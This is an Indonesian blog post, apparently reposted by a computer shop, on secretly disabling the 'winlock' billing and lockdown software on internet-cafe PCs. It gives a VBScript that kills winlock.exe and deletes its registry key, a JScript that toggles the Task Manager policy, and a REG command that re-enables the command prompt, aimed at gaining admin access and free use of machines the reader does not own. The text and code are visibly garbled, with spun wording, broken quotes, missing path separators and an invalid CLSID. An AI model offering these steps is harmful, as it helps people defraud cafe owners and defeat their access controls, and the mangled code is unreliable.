Top Menu

Cara Mematikan Billing Warnet Diam-Diam

By joe

Posted in , , | Tags : , ,

Okey, Pasti semua udah tau winlock itu apa kan ? Kalo belum tau search aja di google yah, hihihihi. Ya pada dasarnya sih winlock itu dipakai buat mengurangi susukan kita terhadap komputer tersebut. Misalkan, gak dapat download atau gak dapat buka Drive di komputer tersebut. Disini aku cuma mau sharing aja pengalaman aku mengakibatkan diri sebagai admin winlock tersebut.

OK. Yang dibutuhin cuma

  1. Notepad / Wordpad.

Pikirkan gimana caranya buat buka notepad tersebut. Banyak caranya. Dari sound device pun dapat buka notepad. Dan langganan aku buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music.

Ya tinggal save as >> pilih desktop >> terus save dengan ekstensi .txt / .doc deh.. Ok pribadi aj ya, udah dibuka notepad/wordpad? Usahakan cek dulu ada deepfreeze atau kagak. Kalo ada deepfreeze kan dapat ngilangin jejak deh dengan restart komputer. Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.

Copy script ini:

strComputer = .”

Set objWMIService = GetObject(“winmgmts:” _

& {impersonationLevel=impersonate}!\” & strComputer & rootcimv2)

Set colProcessList = objWMIService.ExecQuery _

(“Select * from Win32_Process Where Name = “winlock.exe”)

For Each objProcess in colProcessList

objProcess.Terminate()

Next

Const HKEY_CLASSES_ROOT = &H80000000

strComputer =

Set objRegistry=GetObject(winmgmts:\ & _

strComputer & rootdefault:StdRegProv)

strKeyPath = CLSID{D1A17367-4546-PRT8-6A19-11OO4FFI823O}ProgID

strValueName = ID

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName

Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya. Sebenarnya itu 2 script yang dijadikan 1 alasannya kesamaan ekstensi.

Keterangan:

  • Script 1 : Buat kill winlock.exe, alasannya biasanya task manager di disable kan ?
  • Script 2 : Buat delete key ID Winlock di regedit yang berada di CLSID{D1A17367-4546-PRT8-6A19-11OO4FFI823O}ProgID

Sekarang step 2. (AKTIFKAN TASK MANAGER)

Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt). Kalo taskmanager / startnya gak didisable, dapat pribadi aja buka command prompt di accesories. Dan coba saja windows+R, jikalau bisa, ya pribadi aja copy script aktifkan command promptnya dibawah.

/// Program Ramping Mengamankan Task Manager

// Nama Program: tsk_mgr.js

function prakata(pesan)

{

natan.popup(pesan,0,”Menjaga Task Manager”);

}

function catat(harga)

{

natan.RegWrite(HKCU\Software\microsoft\Windows \CurrentVersion”+\Policies\System\DisableTaskMgr,harga,”REG_DW ORD);

}

var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;

natan = WScript.CreateObject(WScript.Shell”);

pesan = Menu Pilihan :nn

Klik [Yes] untuk Nonaktifkan Task Manager.n

Klik [No] untuk Aktifkan Task Manager.n

Klik [Cancel] untuk Keluar.nn

[+] http:www.aplikasipc.com [+]nn

NonAktifkan Task Manager sekarang?

tanya = natan.popup(pesan,0,”Menjaga Task Manager,vbYesNoCancel);

if (tanya == vbYes)

{

harga=1;

pesan=”Task Manager DiNonAktifkan! visit http://www.aplikasipc.com;

catat(harga);

prakata(pesan);

}

else if (tanya == vbNo)

{

harga=0;

pesan=”Task Manager DiAktifkan! visit http://www.aplikasipc.com;

catat(harga);

prakata(pesan);

}

else

{

pesan=”visit http://www.www.aplikasipc.com”;

prakata(pesan);

}

 Pasti semua udah tau winlock itu apa kan  Cara Mematikan Billing Warnet Diam-Diam

Save dengan ekstensi .js dan jalankan, kemudian pilih NO buat mengaktifkan task manager. Lalu buka task manager (ctrl+alt+del) >> Pilih tab users >> Klik sajian File >> Pilih Run >> Lalu copy paste script ini di situ.

REG add HKCUSoftwarePoliciesmicr*softWindowsSystem /v DisableCMD /t REG_DWORD /d 0 /f

Ini fungsinya buat mengaktifkan command prompt. Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt. Setelah masuk command prompt, Silahkan cari dimana folder winlock berada. Misalkan berada di folder C:program fileswinlockpro

  • Ketik C: kemudian enter Ketik cd aktivitas files kemudian enter
  • Ketik cd winlockpro kemudian enter
  • Dan ketik winlock.exe kemudian enter

TADA.. Sekarang anda winlock gres pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang gres semoga gak mengganggu. Sekarang Anda bebas mau ngapain aja. Mau Download/Colok USB/dll pokoknya dapat deh, kan udah jadi admin.

Perhatian: Ini hanyalah sebagai edukasi saja, aku tidak bertanggung jawab atas hal apapun yang terjadi.


Sumber https://product.balimediakomputer.com/

Share this story

About The joe

Bali Media Komputer adalah sebuah perusahaan yang bergerak di bidang pengadaan komputer, perlengkapan dan aksesoris komputer. Call Us : 0821 4567 5758

Related Posts

Comments are closed.
btt
BaliMediakomputer.com Toko Online Jual Produk Hardware Resmi Di Denpasar Bali Dengan Pelayanan Tercepat, Aman dan Terpercaya. Call Us 082145675758 - 087762649000 / Email : info@balimediakomputer.com